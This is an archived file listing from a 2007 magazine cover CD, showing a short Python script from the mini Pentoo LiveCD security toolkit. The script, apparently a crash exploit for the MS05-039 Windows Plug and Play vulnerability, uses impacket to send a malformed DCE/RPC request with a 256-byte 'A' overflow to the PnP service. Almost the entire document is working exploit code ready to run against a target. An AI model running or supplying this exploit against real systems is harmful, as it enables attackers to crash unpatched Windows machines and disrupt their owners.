home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / bin / ms05-039-crash.py

< prev

next >

Wrap

Text File  |  2006-05-22  |  732b  |  31 lines

---

1. import sys
2. from exploit import DCERPCExploit
3. from impacket.structure import Structure
4.  
5. class PNP_QueryResConfList(Structure):
6.     alignment = 4
7.     structure = (
8.     ('treeRoot',    'w'),
9.     ('resourceType','<L=0xffff'),
10.     ('resourceLen1','<L-resource'),
11.     ('resource',    ':'),
12.     ('resourceLen2','<L-resource'),
13.     ('unknown_1',   '<L=4'),
14.     ('unknown_2',   '<L=0'),
15.     ('unknown_3',   '<L=0'),
16.     )
17.  
18. class UMPNPExploit(DCERPCExploit):
19.     UUID = ('8d9f4e40-a03d-11ce-8f69-08003e30051b','1.0')
20.  
21.     def attackRun(self):
22.     query = PNP_QueryResConfList()
23.  
24.     query['treeRoot'] = "ROOT\\ROOT\\ROOT\x00".encode('utf_16_le')
25.     query['resource'] = '\x00'*8+'\x00\x01\x00\x00'+'A'*256
26.  
27.     self.dce.call(0x36, query)
28.  
29. e = UMPNPExploit(sys.argv[2:])
30. e.run()
31.